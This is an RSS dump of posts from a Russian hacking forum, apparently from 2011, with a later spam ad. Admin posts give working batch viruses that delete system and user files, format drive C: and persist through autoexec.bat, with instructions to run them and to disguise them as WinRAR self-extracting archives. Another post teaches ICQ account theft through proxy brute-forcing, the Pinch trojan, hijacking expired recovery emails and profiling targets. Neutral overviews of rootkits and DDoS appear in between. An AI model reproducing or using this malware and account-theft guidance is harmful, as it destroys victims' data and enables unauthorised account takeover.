http://besthacker.mybb.ru/ HACK ru-ru Fri, 17 Mar 2023 13:40:31 +0300 MyBB/mybb.ru http://besthacker.mybb.ru/viewtopic.php?pid=13#p13 <p>Компьютеры, ноутбуки - техника современная и не застрахована от поломок. К такому типу техники нужен своевременный и комплексный подход, который могут обеспечить наши компетентные мастера. Самостоятельно починить компьютер сможет 5 человек из 100, а поломки происходят у каждого второго! Мы предоставляем услуги высокого качества по ремонту и исправлению проблем компьютерной техники более чем в 60 городах по РФ. Так же наши филиалы представлены в Республике Беларусь. Заявки обрабатываются нашими сотрудниками и не перепродаются в сторонние компании. Перейти:&#160; <a href="https://rempc-v-mo.ru/?t=33705" rel="nofollow" target="_blank">https://rempc-v-mo.ru/?t=33705</a></p> mybb@mybb.ru (xoejsaifms) Fri, 17 Mar 2023 13:40:31 +0300 http://besthacker.mybb.ru/viewtopic.php?pid=13#p13 http://besthacker.mybb.ru/viewtopic.php?pid=12#p12 <p><strong><span style="color: red">Внимание! Данный раздел сайта создан исключительно для изучений возможностей среды MS-DOS. Любые приведенные здесь примеры носят исключительно образовательный характер. Автор не несет никакой ответственности за любой ущерб связанный с применением материалов этой страницы, а также программ полученных с этого сайта</span></strong></p> <p><img class="postimg" loading="lazy" src="http://s2.hubimg.com/u/4122125_f520.jpg" alt="http://s2.hubimg.com/u/4122125_f520.jpg" /></p> <p>В этом разделе пойдет речь о программах написанных в среде MS-DOS и как следствие имеющих расширение &quot;bat&quot;. Вообще в этой среде можно создать примитивнейшие программы выполняюшие как полезные, так и разрушительные действия с вашей системой, но от их примитивности действенность не уменьшается. Для этого почти ничего не нужно кроме текстового редактора( например: блокнот в Windows) и елементарного знания команд DOS'а. Одним словом - все всем под силу. </p> <p>Вообще в данное время четкого определения вирусам нет, хотя существуют несколько общих аспектов которые позволяют называть ту или иную программу вирусом. Это способность самостоятельно создавать свои копии( распростроняться в системе) , выполнять те или иные действия( чаще разрушительные) без ведома и контроля хозяина системы....и т.д. В среде МS-DOS( далее &quot;МД&quot;) есть команды копирования (COPY) , удаления (DEL) файлов, а также форматирования дисков (Format C:) и как следствие наличия этих комманд в &quot;МД&quot; можно создать вирус, который при определенных условиях будет копироваться в определенные места жесткого диска, удалять все файлы или файлы определенного вида(например только текстовые, или МР3, видео, драйвера, системные, и наконец просто одну программу) , создавать совершенно ненужные , но занимающие место(копировать уже существующие неоднократно придавая им разные имена), провоцировать сбой, выключение компьютера, перезагрузку, все в зависимости от фантазии создателя. Наряду с этим можно написать полезную программу выполняющую позитивные действия( например копирование файлов при установке программы, массовое удаление файлов засоряющих систему(*.tmp в Windows98) и многое другое.</p> <p>Итак пример простейшего вируса который можно написать за 1 минуту. Пусть программа с расширением &quot;Ват&quot; называется &quot;JKL&quot;(JKL.bat).</p> <p><span style="color: red"><strong>ПРИМЕР 1</strong></span></p> <p><span style="font-style: italic">COPY JKL.bat C:\JKL.Bat</p> <p>COPY JKL.bat C:\Windows\FIFA.bat</p> <p>del C:\*.sys</p> <p>del: C:\Command.com</p> <p>del: C:\Windows\*.exe</p> <p>del: JKL.bat</span></p> <p><strong><span style="color: red">ПРИМЕР 2</span></strong></p> <p><span style="font-style: italic">mode con codepage prepare=((866) C:\WINDOWS\COMMAND\ega3.cpi)</p> <p>mode con codepage select=866keyb ru,,C:\WINDOWS\COMMAND\keybrd3.sys</p> <p>COPY JKL.bat C:\Autoexec.Bat</p> <p>COPY C:\Autoexec.bat С:\Windows\JKL.bat</p> <p>COPY C:\Autoexec.bat C:\Windows\System32\Autoexec.bat</p> <p>dir &gt;C:\Dzeran.boom.ru.htm</p> <p>del C:\*.txt</p> <p>del: C:\*.doc</p> <p>del: C:\Windows\*.exe </p> <p>del: JKL.bat</span></p> <p>В первом примере вирус при запуске копирует свое тело на диск С и в папку Windows под именем JKL. Затем удаляет файлы с расширением SYS,COM,EXE. и удаляет сам себя. Всего 6 строк, а сколько разрушений...</p> <p>Во втором примере тот же вирус удаляет все текстовые файлы на диске С ,приобрел свойства автозагрузки копируя себя на диск С под именем Autoexec.bat заменяя тем самым оригинал.Но сам оригинал очень важен для работы системы и поэтому вирус имеет в своем теле содержимое самого Autoexec.bat.Проще говоря &quot;Чтобы компьютер запускался&quot;! Свойства автозагрузки придает вирусу относительную живучесть. И сколко не удаляй все копии вируса с диска-они все равно при каждом включении или перезагрузке компьютера будут возрождаться из пепла, пока не вылечить сам Autoexec.bat.( вылечив Autoexec.bat не забудьте удалить все копии вируса иначе начинайте все сначала). &quot;Преимуществом&quot; этих вирусов является его мизерная величина( менее 1 Килобайта)</p> <p>Это самые примитивные программы-вирусы которые могут размножаться. Но можно написать вредоносную программу не имеющую таких свойств, и полностью убивающую информацию на диске. Что назвается &quot;Только запусти&quot; <strong>Пример:</strong></p> <p><span style="font-style: italic">del C:\*.exe<br />echo y|del*.*<br />echo y|Format C:<br />echo y|del C:\*.*<br />echo y|del D:\*.*</span> - Пять строчек- и информации каюк...Если не форматнет, так удалит все файлы(по большому счету разности никакой).</p> <p>Итак: Для тех кто не понимает как можно воспользоваться таким вирусом( но делать этого не советую, так как вы уведомлены о его действиях и будете нести только свою ответственность за весь ущерб) я повторю...</p> <p>1. Скопировать текст вируса с этой страницы<br />2. Открыть текстовый редактор( блокнот)<br />3. Вставить текст<br />4. Сохранить как: Имя_Файла.bat<br />5. Запустить</p> <p>Таким способом можно создать как совершенно убийственные программы-вирусы, так и безопасные только распространяющиеся или выводящие текст при включении компьютера. Это зависит от фантазии автора.</p> <p><strong><span style="color: red">Автор поста не несет ответственности за использование данного урока, помним про УК РФ и статьи 272-274, все представленно исключительно в ознакомительных целях!!!</span></strong></p> mybb@mybb.ru (Admin) Wed, 02 Mar 2011 12:24:06 +0300 http://besthacker.mybb.ru/viewtopic.php?pid=12#p12 http://besthacker.mybb.ru/viewtopic.php?pid=11#p11 <p><img class="postimg" loading="lazy" src="http://www.ciasolutions.com.au/images/inv3.jpg" alt="http://www.ciasolutions.com.au/images/inv3.jpg" /></p> <p>Еще недавно злоумышленники писали лишь вирусы, которые защитные программы вылавливали и обезвреживали без особых проблем. Достаточно было установить и правильно настроить антивирусную систему, регулярно обновлять ее базу... И жить спокойно. Сегодня интернет-злоумышленники действуют куда масштабнее! Их уже не прельщает «всего лишь» заражение сотен тысяч компьютеров и даже пандемия нового вируса. Они стремятся получить контроль над множеством ПК и использовать их для своих темных дел. Из миллионов зараженных систем они создают огромные сети, управляемые через Интернет. Используя гигантскую вычислительную производительность «зомби-сетей», можно, например, производить массовые рассылки спама и организовывать хакерские атаки невиданной ранее мощности. В качестве вспомогательного инструмента для таких целей очень часто используют новый, особо опасный тип вредоносных программ – руткиты. </p> <p><strong>Что такое руткиты?</strong><br />Руткиты не только прячутся сами, но и скрывают другое вредоносное ПО, проникшее в систему. Цель маскировки – незаметно для антивирусов и других защитных программ захватить чужой компьютер. У таких руткитов, как Hacker Defender, в запасе весьма изощренные трюки. Этот замаскированный «вредитель» в обход брандмауэра открывает тайные лазейки в Интернет, которые позволяют хакерам управлять зараженным компьютером. Через созданный руткитами «черный ход» можно получать конфиденциальные данные (например, пароли) или внедрять в систему другие вредоносные программы. Руткитов пока немного. Но, к сожалению, для них (как и для вирусов) созданы «конструкторы», используя которые, даже малоопытные хулиганы могут создавать «замаскированных вредителей» (см. врезку на стр. ??) и использовать их по своему усмотрению. Большинство антивирусных программ распознает такой вредоносный «софт», пока он не активен (скажем, «дремлет» в виде документа, прикрепленного к электронному письму). Но стоит двойным щелчком открыть кажущийся безобидным файл, и руткит активируется и «заберется» в сокровенные глубины системы. После этого найти и обезвредить его смогут лишь специальные приложения. ComputerBild протестировал 8 программ, задачей которых является распознавание и удаление руткитов. Все участники тестирования присутствуют на DVD, прилагаемом к этому номеру журнала.</p> <p><strong>Хитрости руткитов</strong><br />Руткит пробирается в компьютер, чтобы использовать его в криминальных целях. Он может быть прикреплен к электронному письму, например в виде счета в формате PDF. Если вы щелкнете по мнимому счету, вредитель-невидимка активируется.<br />Затем руткит забирается глубоко в операционную систему Windows и изменяет один из файлов библиотек – *.dll. И последовательность команд, которая управляет правильной работой программ, попадает под контроль вредителя.<br />«Захват власти» руткитом остается незамеченным, и он спокойно загружает из Интернета другой вредоносный «софт».<br />Новые вредители маскируются с помощью руткита. Теперь компьютер может быть использован для различных мошеннических действий, например для рассылки спама.</p> <p><strong>Как маскируются руткиты?</strong><br />Антивирусные программы обычно распознают вредоносный «софт» по сигнатурам – характерным цепочкам кода в теле вируса. Это своего рода «особые приметы», по которым можно опознать и уничтожить «вредителя». Производители защитных программ регулярно размещают в Интернете обновления с последними обнаруженными сигнатурами. Кроме того, антивирусы узнают «вредителей» по некоторым особенностям их поведения – этот способ получил название «эвристический анализ». Если, к примеру, некая программа собирается удалить все MP3-файлы, сохраненные на жестком диске, скорее всего, это вирус, работу которого нужно блокировать, а его – уничтожить.<br />Чтобы обмануть антивирусные программы, руткиты манипулируют процессами, с помощью которых компьютерные приложения обмениваются данными. Из этих потоков они удаляют сведения о себе и других вредителях. Антивирус получает ложную информацию и считает, что «в Багдаде все спокойно» (см. рисунок слева).<br />Некоторые руткиты (так называемые «руткиты режима пользователя») перехватывают потоки данных между программами (например, между Windows и антивирусом) и манипулируют ими по своему усмотрению.<br />Другие руткиты (их называют «руткитами режима ядра») «сидят» глубже, между отдельными компонентами Windows или даже в системном реестре, и оттуда посылают антивирусу ложные данные</p> <p><strong>Как распространяются руткиты? </strong><br /><span style="display: block; text-align: center">Иногда руткиты приходят в почтовых вложениях, маскируясь под документы разных форматов (например, PDF). На самом деле, такой «мнимый документ» является исполняемым файлом. Тот, кто попытается его открыть, активирует руткит.<br />Еще один путь распространения – подвергшиеся хакерской манипуляции сайты. Ничего не ведающий пользователь просто открывает веб-страницу – и руткит попадает в его компьютер. Это становится возможным из-за «дыр» в системе безопасности браузеров<br /></span><br /><strong>«Самодельные» руткиты</strong><br />Тысячи компьютеров, зараженных руткитами, образуют огромные «зомби-сети», используемые для рассылки спама в обход ничего не подозревающих пользователей. До последнего времени считалось, что такие махинации доступны лишь опытным программистам-профессионалам. Однако уже в ближайшем будущем ситуация может измениться. В Интернете все чаще встречаются так называемые Toolkits (наборы инструментов) для изготовления скрытых вредителей, например, довольно популярный Pinch. С помощью этого «софта» даже неопытный пользователь может создать «вредителя-невидимку»... Основой для него послужит Pinch Builder Trojan, который с помощью программного интерфейса Pinch можно оснастить разнообразными вредоносными функциями. Согласно информации, опубликованной на сайте производителя антивирусов Panda Software, Pinch Builder Trojan может: <br /><span style="display: block; text-align: center">красть пароли браузеров, в частности Mozilla и Opera, и пересылать их интернет-мошенникам; благодаря доступу к специальным областям Windows он также умеет выведывать пароли Internet Explorer и Outlook;<br />считывать данные, вводимые с клавиатуры (в частности, пароли), и передавать их в Интернет;<br />скрывать свои вредоносные функции – программа искусно защищает «троянские» процессы от обнаружения антивирусным «софтом».<br />Андреас Маркс, эксперт антивирусной тестовой лаборатории AV-Test, которая регулярно проводит испытания по заказу ComputerBild, подтверждает: «Наборы для создания троянов уже продаются на специальных веб-сайтах за несколько сотен евро. Если по Интернету распространится широкая волна таких самодельных «вредителей», руткиты станут настоящим бедствием для пользователей».</span> </p> <p><strong>Как избавиться от руткитов?</strong><br />Установите программу Gmer, победившую в нашем тесте. Она уверенно обнаруживает руткиты и скрытых «вредителей» других типов, а также способна удалить большинство из них. Оставшиеся руткиты можно «доконать» с помощью утилиты AVG Anti-Rootkit. После удаления «вредителей» следует проверить систему обычным антивирусом, например из пакета программ Kaspersky Internet Security.</p> <p><strong>Обобщение результатов тестирования</strong><br />Наш тест 8 антируткитов показал, что против хитрых замаскированных вредителей есть надежное средство. Правда, чтобы избавиться от непрошеных гостей, вам придется отправить на поиски руткитов сразу несколько «охотников». </p> <p><strong>Распознавание руткитов</strong><br />В ходе тестирования выяснилось, что далеко не всем «охотникам за руткитами» под силу вывести на чистую воду замаскированных «вредителей». Обнаружить все активные руткиты смогли лишь три программы: победитель теста Gmer 1.0, AVG Anti-Rootkit и Rootkit Unhooker. Тот, кто пользуется этими приложениями, может быть уверен, что его компьютер не подвергнется нашествию «вредителей-невидимок». Кроме того, Gmer оказалась единственной программой, которой удалось найти все руткиты в альтернативных потоках данных. </p> <p><strong>Удаление руткитов</strong><br />Ничуть не лучше обстояло дело с удалением вредоносного «софта». Gmer хотя и нашла все руткиты, смогла уничтожить только 63% из них, а также 87% других опасных программ, маскировавшихся «за компанию». Вредителям, которые прятались в альтернативных потоках данных, повезло еще меньше: на жестких дисках тестовых компьютеров не осталось ни одного из них. Это и принесло программе победу. Зато у второго призера доля удаленных активных руткитов была выше почти на четверть (86,67%). В том маловероятном случае, когда победитель теста Gmer не сможет удалить с жесткого диска всех вредителей, AVG Anti-Rootkit доведет работу до конца. </p> <p><strong>Слишком сложное управление</strong><br />То, что обнаружение скрытого вредоносного «софта» – дело серьезной, заметно по сложности управления программами. Интерфейс всех приложений, участвовавших в тесте, англоязычный, а непонятные сообщения способны сбить с толку даже опытного пользователя... </p> <p><strong>Итог</strong><br />К нашей радости, победитель теста – Gmer 1.0 – и второй призер, AVG Anti-Rootkit, обнаружили все 30 руткитов, «спрятавшихся» на тестовых компьютерах, и исправно сообщали о других скрытых опасностях. Gmer, кроме того, распознала всех «замаскированных вредителей», которые скрывались в альтернативных потоках данных (именно это и принесло ей победу в общем зачете). И Gmer, и AVG Anti-Rootkitудаляют большую часть найденных «вредителей», но все-таки не всех... Добиться максимального эффекта позволяет одновременное использование этих двух программ. Все остальные антируткиты получили оценку «плохо».</p> <p>Не много сперто <a href="http://www.computerbild.ru/" rel="nofollow" target="_blank">Тут</a></p> mybb@mybb.ru (Admin) Mon, 28 Feb 2011 10:35:27 +0300 http://besthacker.mybb.ru/viewtopic.php?pid=11#p11 http://besthacker.mybb.ru/viewtopic.php?pid=10#p10 <p><img class="postimg" loading="lazy" src="http://off-side.ucoz.ru/4f984a413fdf65955d30cd3976ed352e.jpg" alt="http://off-side.ucoz.ru/4f984a413fdf65955d30cd3976ed352e.jpg" /></p> <p>Терроризм - это, пожалуй, самая большая проблема человечества на сегодняшний день. И виртуальное сообщество здесь мало чем отличается от реального мира. Ушли те романтические времена, когда собирательным образом хакера являлся хитрый тип, взломавший защиту банка и перекачавший на свой счет кругленькую сумму. Жесткие времена - жесткие нравы. Теперь хакеры с помощью атаки на сервер блокируют его работу, а затем выставляют хозяевам свои требования. Виртуальный террор в чистом виде. Редкий месяц обходится без сенсационных сообщений в прессе о том, что тот или иной сервер подвергся DDoS-атаке. В данном обзоре попытаемся разобраться в том, что такое DDoS-атака и что можно предпринять, чтобы снизить ее опасность.</p> <p>DDoS-атака - сокращение от Distributed Denial Of Service Attack. Особенностью данного вида компьютерного преступления является то, что злоумышленники не ставят своей целью незаконное проникновение в защищенную компьютерную систему с целью кражи или уничтожения информации. Цель данной атаки - парализовать работу атакуемого веб-узла. Первые сообщения о DDoS-атаках относятся к 1996 году. Но всерьез об этой проблеме заговорили в конце 1999 года, когда были выведены из строя веб-серверы таких корпораций, как Amazon, Yahoo, CNN, eBay, E-Trade и ряда других, немногим менее известных. Спустя год, в декабре 2000-го &quot;рождественский сюрприз&quot; повторился: серверы крупнейших корпораций были атакованы по технологии DDoS при полном бессилии сетевых администраторов. С тех пор сообщение о DDoS-атаке уже не являются сенсацией. Главной опасностью здесь является простота организации и то, что ресурсы хакеров являются практически неограниченными, так как атака является распределенной.</p> <p>Схематически DDoS-атака выглядит примерно так: на выбранный в качестве жертвы сервер обрушивается огромное количество ложных запросов со множества компьютеров с разных концов света. В результате сервер тратит все свои ресурсы на обслуживание этих запросов и становится практически недоступным для обычных пользователей. Циничность ситуации заключается в том, что пользователи компьютеров, с которых направляются ложные запросы, могут даже не подозревать о том, что их машина используется хакерами. Программы, установленные злоумышленниками на этих компьютерах, принято называть &quot;зомби&quot;. Известно множество путей &quot;зомбирования&quot; компьютеров - от проникновения в незащищенные сети, до использования программ-троянцев. Пожалуй, этот подготовительный этап является для злоумышленника наиболее трудоемким.</p> <p>Чаще всего злоумышленники при проведении DDoS-атак используют трехуровневую архитектуру (на рисунке она шестиуровневая, но принцип тотже), которую называют &quot;кластер DDoS&quot;. Такая иерархическая структура содержит:</p> <p><img class="postimg" loading="lazy" src="http://www.islandcrisis.net/wp-content/uploads/2009/08/DDos_Attack.svg.png" alt="http://www.islandcrisis.net/wp-content/uploads/2009/08/DDos_Attack.svg.png" /></p> <p>Управляющую консоль (их может быть несколько), т.е. именно тот компьютер, с которого злоумышленник подает сигнал о начале атаки;<br />Главные компьютеры. Это те машины, которые получают сигнал об атаке с управляющей консоли и передают его агентам-&quot;зомби&quot;. На одну управляющую консоль в зависимости от масштабности атаки может приходиться до нескольких сотен главных компьютеров;<br />Агенты - непосредственно сами &quot;зомбированные&quot; компьютеры, своими запросами атакующие узел-мишень.</p> <p>Проследить такую структуру в обратном направлении практически невозможно. Максимум того, что может определить атакуемый, это адрес агента. Специальные мероприятия в лучшем случае приведут к главному компьютеру. Но, как известно, и компьютеры-агенты, и главные компьютеры являются также пострадавшими в данной ситуации и называются &quot;скомпрометированными&quot;. Такая структура делает практически невозможным отследить адрес узла, организовавшего атаку.</p> <p>Другая опасность DDoS заключается в том, что злоумышленникам не нужно обладать какими-то специальными знаниями и ресурсами. Программы для проведения атак свободно распространяются в Сети.</p> <p><img class="postimg" loading="lazy" src="http://hostinfo.ru/ill/0411103.jpg" alt="http://hostinfo.ru/ill/0411103.jpg" /> Дело в том, что изначально программное обеспечение DDoS создавалось в &quot;мирных&quot; целях и использовалось для экспериментов по изучению пропускной способности сетей и их устойчивости к внешним нагрузкам. Наиболее эффективным в этом случае является использование так называемых ICMP-пакетов (Internet control messaging protocol), т.е. пакетов, имеющих ошибочную структуру. На обработку такого пакета требуется больше ресурсов, после решения об ошибочности пакет отправляется посылающему, следовательно достигается основная цель - &quot;забивается&quot; трафик сети.</p> <p>За годы это программное обеспечение постоянно модифицировалось и к настоящему времени специалисты по информационной безопасности выделяют следующие виды DDoS-атак:</p> <p>UDP flood - отправка на адрес системы-мишени множества пакетов UDP (User Datagram Protocol). Этот метод использовался в ранних атаках и в настоящее время считается наименее опасным. Программы, использующие этот тип атаки легко обнаруживаются, так как при обмене главного контроллера и агентов используются нешифрованные протоколы TCP и UDP.<br />TCP flood - отправка на адрес мишени множества TCP-пакетов, что также приводит к &quot;связыванию&quot; сетевых ресурсов.<br />TCP SYN flood - посылка большого количества запросов на инициализацию TCP-соединений с узлом-мишенью, которому, в результате, приходится расходовать все свои ресурсы на то, чтобы отслеживать эти частично открытые соединения.<br />Smurf-атака - пинг-запросы ICMP (Internet Control Message Protocol) по адресу направленной широковещательной рассылки с использованием в пакетах этого запроса фальшивый адрес источника в результате оказывается мишенью атаки.<br />ICMP flood - атака, аналогичная Smurf, но без использования рассылки.</p> <p>Естественно, наиболее опасными являются программы, использующие одновременно несколько видов описанных атак. Они получили название TFN и TFN2K и требуют от хакера высокого уровня подготовки.</p> <p>Одной из последних программ для организации DDoS-атак является Stacheldracht (колючая проволока), которая позволяет организовывать самые различные типы атак и лавины широковещательных пинг-запросов с шифрованием обмена данными между контроллерами и агентами.</p> <p>Конечно же, в этом обзоре указаны только наиболее известные программы и методики DDoS. На самом деле спектр программ намного шире и постоянно дополняется. По этой же причине достаточно наивным было бы описание универсальных надежных методов защиты от DDoS-атак. Универсальных методов не существует, но к общим рекомендациям для снижения опасности и уменьшения ущерба от атак можно отнести такие меры, как грамотная конфигурация функций анти-спуфинга и анти-DoS на маршрутизаторах и межсетевых экранах. Эти функции ограничивают число полуоткрытых каналов, не позволяя перегружать систему.</p> <p>На уровне сервера желательно иметь вывод консоли сервера на другой IP-адрес по SSH-протоколу для возможности удаленной перезагрузки сервера. Другим достаточно действенным методом противодействия DDoS-атакам является маскировка IP-адреса.</p> <p>Весьма важным делом в этом направлении является профилактика - программное обеспечение должно быть &quot;отпатчено&quot; от всевозможных &quot;дыр&quot;.</p> <p>Как уже отмечалось, обнаружить виртуальных террористов, организовавших DDoS-атаку, задача очень сложная. Поэтому для борьбы с данным видом угроз необходимо тесное сотрудничество администраторов серверов и с интернет-провайдерами, а также провайдеров с операторами магистральных сетей. Потому что, как и в реальной жизни, бороться с терроризмом возможно только объединением законопослушных граждан. Будь внимательны и не попадетесь!</p> <p><span style="display: block; text-align: right">Источник: www.hostinfo.ru</span></p> mybb@mybb.ru (Admin) Mon, 28 Feb 2011 10:24:00 +0300 http://besthacker.mybb.ru/viewtopic.php?pid=10#p10 http://besthacker.mybb.ru/viewtopic.php?pid=9#p9 <p></p> <p>P.S. Помним что все статьи представленны <span style="color: red">ИСКЛЮЧИТЕЛЬНО В ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЯХ</span>, статьи 272-275 УК РФ</p> mybb@mybb.ru (Admin) Fri, 25 Feb 2011 13:27:52 +0300 http://besthacker.mybb.ru/viewtopic.php?pid=9#p9 http://besthacker.mybb.ru/viewtopic.php?pid=8#p8 <p><img class="postimg" loading="lazy" src="http://www.plansoft.ru/wp-content/uploads/2010/12/80.jpg" alt="http://www.plansoft.ru/wp-content/uploads/2010/12/80.jpg" /></p> <p>Вступление:<br />Сейчас я расскажу, как без знания программирования написать свой вирус с расширением .bat. Статья предоставлена для начинающих вирусописателей (ПОВТОРЯЮ «ДЛЯ НАЧИНАЮШИХ»). И вот еще что: статья написана в ознакомительных целях, и за использование нижеизложенной информации в целях нанесения вреда я не несу никакой ответственности. <br />При написания вируса я использовал обыкновенный блокнот.</p> <p>Итак начнем :-))) , каждую новую строчку я буду пояснять.</p> <p>@Echo off <span style="color: red">(запрещаем вывод на экран исполняемых команд)</span><br />Echo Virus Loading <span style="color: red">(Выводит на экран надпись «Virus Loading» В место нее можете писать что угодно)</span><br />Date 13.09.96 <span style="color: red">(эта строка изменяет дату)</span><br />If exist c:ski.bat goto abc <span style="color: red">(проверяет существует ли файл, …..) </span><br />Copy %0 c:ski.bat <span style="color: red">(копирует вирус только изменив названия)</span><br />Attrib +h c:ski.bat <span style="color: red">( делает файлу ski.bat атрибут скрытый )</span><br />Echo c:ski.bat &gt;&gt;autoexec.bat <span style="color: red">(Прописывает файл ski.bat в автозагрузку)</span><br />:abc <span style="color: red">( ……если он существует, то программа перейдет на метку :abc) </span><br />md PRIDUROK<br />md LUZER<br />md DURAK <span style="color: red">(Создает пустые папки)</span><br />md LAMER<br />Label E: PRIDUROK <span style="color: red">(CD-ROM будет называться PRIDUROK)</span><br />assoc .exe=.mp3 <span style="color: red">(запускает все ексшники как музыка )</span><br />del c:Program Files/q <span style="color: red">(удаляет все файлы из этой папки)</span><br />Echo VIRUS LOAD <span style="color: red">(Выводит надпись)</span></p> <p>Итак мы написали простой вирус. Теперь нажимаем ФАЙЛ&gt;&gt;СОХРАНИТЬ КАК, и в поле имя файла пишем, например virus.bat <br />.bat обязательна везде. Появился значок MS-DOS. Так что бы жертва не смогла увидеть его код будем использовать WIinRar. Берем наш вирусочек и кидаем его в архив вылетит окно и ты просто ставишь галочку «создать SFX-архив. Далее заходим в дополнительное и открываем параметры SFX там есть строка выполнить после распаковки и ты пишешь РЕАЛЬНОЕ имя твоего вируса. Видишь простой блокнот вступил как вирусосаздатель, а WinRar сделал якобы программу….выводы делать тебе. И смотри непопадись сам на это. Не принимай файлы в инете от незнакомых людей и смотри на размер файла.<br />P.S. Помним о статьях 272-274 УК РФ.</p> mybb@mybb.ru (Admin) Fri, 25 Feb 2011 13:17:49 +0300 http://besthacker.mybb.ru/viewtopic.php?pid=8#p8 http://besthacker.mybb.ru/viewtopic.php?pid=7#p7 <p><img class="postimg" loading="lazy" src="http://sngpoisk.net/img/icq_7_01.jpg" alt="http://sngpoisk.net/img/icq_7_01.jpg" /></p> <p>Итак в данной статье я ознакомлю вас со всеми известными мной способами взлома icq номерков.</p> <p>При подборе софта лучше проверять его неотходя от кассы если можно так сказать , потому что часто мелькают на форумах и сайтах.. уже как столет неработающие проги и скрипты<br />Ну например очень распространенная программа «Безпроксевый брутус ICQ» <br />И кто-то ж пытается им что-то сбрутить<br />мда нам смешно, смешно конечно…<br /></p> <p>И таких программ огромная куча так что будьте внимательны при выборе софта дорогие новички и школьники </p> <p>Ну а теперь непосредственно к самому распространенному виду взлома icq да наверное вообще взлома …<br />Подойдет любая программа ну например «IPD brute2/udc2 pro»<br /></p> <p>Обязательно нужны будут нам прокси найти их можно на раздачах в форумах соответствующей тематике ну или купить в конце концов, гугл в помощь… <br />&#160; &#160;О программе: <br />Запускаем, жмем &quot;Config&quot;<br />Source... - Там вы указываете путь в нашему замечательному файлу ser1.txt.<br />Dump INcorrect... - в этот файл будут сваливаться плохие пассы. (Советую перед каждым запуском ipd очищать это дело, тк при старте он его тока тормозит.)<br />Dump CORRECT... - в этот файл, если повезет упадет пяток-десяток ХОРОШИХ ась. В п. 3 и 4, советую не менять имена файлов (good и bad), тока приписать к ним полный путь.<br />Threads - потоки. Зависит от кол-ва проксей (об этом позже), то есть если проксей у вас 100, то больше 200 потоков ставить не стоит. Например для dial-up'a 80 потоков вполне достаточно. Для выделинки можно и раз в десять побольше, но и прокси серверов надо будет намного больше.<br />Proxies - Прокси. Файлы проксей мона надыбать везде, особая скорость проксей тут не требуется, но, разумеется, чем быстрее, тем лучше. Особо ленивым список проксей можно взять на этом сайте в разделе &quot;Список proxy&quot;.<br />Птица &quot;Clean up every ... minutes&quot;. Когда вы запускаете IPDBrute, то он вам показывает &quot;Proxies: 0, good: 0, alive: 0&quot;, так вот alive - это количество рабочих проксей. до которых ему удалось достучаться. Для того чтобы он стечал по неработчим проксям и сделана птица &quot;CleanUp&quot;. Т.е. каждые n минут он будет очищать список проксей, и оставлять только рабочие.<br />Жмем ОК, а в проге &quot;Start&quot;. Все процесс пошол.</p> <p>Взлом с помощью вирусов <br />Ну вирусов в интернете много поэтому найти пример несложно<br />Вирус можно написать самому ну а можно уже просто скачать билдер нужного вам вируса. <br />Очень хорошим трояном, которые крадет пароли от основных мессенджеров ICQ (ICQ99b-2003a/2003b/Lite, Miranda-icq, Trillian ICQ&amp;AIM, &amp;RQ и многих других программ) является Pinch</p> <p>Логический взлом:<br />1 <br />Угон асечных номеров по своей сути не является взломом, это скорее ловля на дурака. Все основано на том, что Ася может высылать по запросу «забытый» пароль пользователю на тот ящик, который он указал при регистрации. Причем, если даже потом изменить этот адрес, то пароль все равно будет отсылаться только на тот, который был указан сначала, даже если его уже не существует. Вот именно этим нам и остается воспользоваться. То есть найти такие короткие номера, в которых указан почтовый адрес, которого не существует. Или же получить доступ к существующему мыльнику и спереть высланный на него пароль. Легче всего это сделать, если мыльник халявный, вроде mail.com. В таких почтовых системах тоже есть напоминалки паролей, но это тема отдельной статьи. </p> <p>Некоторые пользователи вообще вводят в качестве почтового адреса какой-нибудь левый, заведомо не существующий адрес с несуществующим доменом. Например: qwerty@qwerty.com, считая, что это оригинально, остроумно и никто никогда такой адрес не сделает (наивные).</p> <p>Если домен существует, но адреса такого нет, тогда ничего не стоит зарегистрировать на том же домене такой ящик. Например, если это lamer@mail.com, идем, соответственно, на wwwmail.com, проверяем, существует ли такой адрес, и если нет (ведь такие бесплатные почтовые системы периодически стирают неактивные адреса), то просто создаем его и заставляем ICQ «напомнить» нам пароль от Аси, в которой этот мыльник указан. Пароль придет в течение суток. Хотя, если этот адрес указан уже позже, а при регистрации был указан другой, то пароль, скорее всего, не придет. Но попытаться стоит. Если адрес был указан на домене какой-нибудь конторы, которая выделяет адреса только для сотрудников, тогда тоже облом. Можно, конечно, еще попытаться достать пароль и от мыльника. </p> <p>Если же не существует домен, как в случае с qwerty@qwerty.com, тогда нужно зарегистрировать домен wwwqwerty.com и создать на нем же ящик с именем qwerty@qwerty.com, а далее «напомнить» пароль на него. Тут ты, конечно же, скажешь: что, мол, мне так для каждого адреса домен регистрировать? Да за него ж еще и платить надо! Ну уж нет, братан, тут ты будешь не прав. Сходи-ка, например, на wwwdoteasy.com - эта система предлагает любому желающему создать домен второго уровня совершенно на халяву, с учетом только того, что тебе нужно будет регулярно обновлять содержимое сайта и что на сайте будет хоть какая-нибудь регулярная посещаемость (маленькая ложка дегтя: за домен надо платить 35 баксов, но деньги берутся не сразу - если за месяц привести двух рефералов, то лавэ твои останутся в целости и сохранности; браться за такой хак надо, только если имеется хотя бы один валидный номер кредитки, а наличие на ней денег не обязательно - прим. ред.). </p> <p>Но нам-то в данном случае нужен не сайт, а всего лишь ящик, да и то на время. Так что заводи там нужный тебе для угона домен, регистрация его может занять от нескольких дней до недели, прежде чем ты сможешь разместить ящик. Можно поискать и другие похожие системы, если в этой тебя что-то не устроит (может они уже изменили условия, пока готовился этот номер). Кое-что о них можно найти тут - <a href="http://sazmoney.narod.ru/web/domain.htm" rel="nofollow" target="_blank">http://sazmoney.narod.ru/web/domain.htm</a> - или введя запрос в поисковом сервере вроде «бесплатные домены». Есть системы, которые позволяют создать только мыльник, в котором и имя, и домен будет таким, как ты захочешь. Нужно только поискать.<br />Чисто логический способ:<br />Добавляем его открываем профиль юзера и открываем блокнот (notepad).<br />И все слова из профиля, вроде ника, имени, фамилии, страны, города, адреса и всяческих комбинаций этого дела вносим через enter в тектовый файл.<br />Затем смотрим мыло. Идем в яндекс или гугл и ищем это мыло. Скорее всего вы найдете много информации на всяких форумах, домашних страничках. <br />Всю информацию в текстовый файл (не прямым текстом , а отдельные слова до 8-ми символов включительно). <br />Также можно войти с ним в контакт, познакомиться из того, что он вам расскажет добавить слов.<br />А в идеале, если у вас есть какой-нить форум или чат или что-то такое, где надо регистрироваться, ЗАСТАВЬТЕ его там зарегаться.<br />Тогда он оставит там пароль. А люди как правило используют один и тот же пароль везде. Так что на 90% он ваш. <br />По-любому, 